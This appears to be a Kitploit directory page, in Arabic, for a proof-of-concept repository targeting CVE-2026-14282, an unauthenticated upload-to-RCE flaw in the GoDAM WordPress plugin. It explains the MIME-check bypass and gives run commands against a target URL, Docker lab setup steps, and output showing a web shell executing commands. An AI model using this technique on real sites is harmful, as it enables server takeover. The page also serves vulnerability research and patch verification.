Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-14282 — # ثغرة GoDAM في إضافة ووردبريس <= 1.12.2: رفع ملفات غير مصادق عليه يؤدي إلى تنفيذ أوامر عن بُعد (CVE-2026-14282) | Kitploit
أدوات/GitHubGitHub/nullwhisper/cve-2026-14282
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقمختبرات وتدريب عملي
GitHubnullwhisper/cve-2026-14282

CVE-2026-14282

# ثغرة GoDAM في إضافة ووردبريس <= 1.12.2: رفع ملفات غير مصادق عليه يؤدي إلى تنفيذ أوامر عن بُعد (CVE-2026-14282)

عرض المستودع
12منذ 29 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-14282 — إضافة GoDAM لووردبريس <= 1.12.2 رفع ملفات بدون مصادقة يؤدي إلى تنفيذ أوامر عن بُعد (RCE)

المؤلف: nullwhisper
حالة الاستخدام: أبحاث أمنية مصرّح بها / التحقق من الثغرات فقط.

ما هذا؟

إصدارات إضافة GoDAM لووردبريس <= 1.12.2 تسجّل حقل WPForms باسم godam_record. معالج الرفع save_video_file() مربوط بالإجراء العام wpforms_process_before_filter، لذلك يعمل قبل أي فحص مصادقة. يثق المعالج في ترويسة Content-Type التي يتحكم فيها المهاجم، ويقبل ملف PHP طالما يبدأ نوع MIME بـ video/، ثم ينقله إلى الدليل المُقدَّم عبر الويب wp-content/uploads/godam/wpforms/. يسمح ذلك لمهاجم بدون مصادقة برفع وتنفيذ كود PHP تعسفي.

  • CVE: CVE-2026-14282
  • المنتج: إضافة GoDAM لووردبريس
  • المتأثر: <= 1.12.2
  • تم الإصلاح: 2.0.0
  • النوع: رفع ملفات تعسفي بدون مصادقة يؤدي إلى RCE
  • CVSS: 9.8 (حرج)
  • المراجع

    • استشارة IONIX: https://www.ionix.io/threat-center/cve-2026-14282/
    • سجل CVE: https://www.cve.org/CVERecord?id=CVE-2026-14282
    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14282
    • صفحة الإضافة على WordPress.org: https://wordpress.org/plugins/godam/

    الملفات

    root@kitploit:~
    .
    ├── cve_2026_14282_poc.py   # السكربت الرئيسي لإثبات المفهوم
    ├── lab/
    │   ├── docker-compose.yml  # بيئة ووردبريس مخبرية
    │   └── setup.php           # ينشئ نموذج WPForms مع حقل GoDAM
    ├── requirements.txt
    └── README.md
    

    التثبيت

    root@kitploit:~
    pip3 install -r requirements.txt
    

    الاستخدام

    هدف مباشر

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u https://target.com/page-with-form
    

    يكتشف السكربت تلقائيًا معرف نموذج WPForms ومعرف حقل GoDAM. إذا كانت الصفحة تحتوي على نماذج متعددة أو فشل الاكتشاف، استخدم:

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
        --form-id 4 --field-id 1 --cmd "whoami"
    

    بيئة مخبرية محلية

    1. نزّل الإضافات الثغرة (لا تعِد توزيع الملفات الثنائية):

      root@kitploit:~
      mkdir -p lab/wpforms-lite lab/godam
      cd lab/wpforms-lite
      wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
      unzip wpforms-lite.latest-stable.zip
      rm wpforms-lite.latest-stable.zip
      cd ../godam
      wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
      unzip godam.1.12.2.zip
      rm godam.1.12.2.zip
      cd ../..
      
    2. شغّل البيئة المخبرية:

      root@kitploit:~
      cd lab
      docker compose up -d
      
    3. أكمل مثبّت ووردبريس على http://127.0.0.1:8092.

    4. ثبّت وفعّل الإضافات، ثم أنشئ النموذج وصفحة الاختبار:

      root@kitploit:~
      docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
      docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
      docker exec -i lab-wpcli-1 php /tmp/setup.php
      
    5. شغّل سكربت إثبات المفهوم:

      root@kitploit:~
      python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
      

    تم التحقق على localhost

    تم الاختبار على WordPress 6.8 + WPForms Lite الأحدث + GoDAM 1.12.2.

    root@kitploit:~
    [*] Detecting WPForms form and GoDAM field...
    [*] Found form ID 4, GoDAM field(s): 1
    [*] Trying upload via field 1...
    [+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
    [+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
    [*] Command output:
    GODAM-RCE-Linux ... PWNED
    

    لماذا لا يتم تضمين ملفات الإضافات الثنائية

    يحتوي هذا المستودع فقط على سكربت إثبات المفهوم وملفات تنسيق البيئة المخبرية. تم استبعاد الملفات الثنائية للإضافات الثغرة لتجنب تضخيم الحجم ومشكلات التوزيع. نزّل الإصدارات الثغرة المحددة من WordPress.org لبيئتك المخبرية الخاصة.

    إخلاء مسؤولية

    هذه الأداة مخصصة للاختبار الأمني والبحث المصرّح به فقط. لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الكود.

    تنزيل الأداة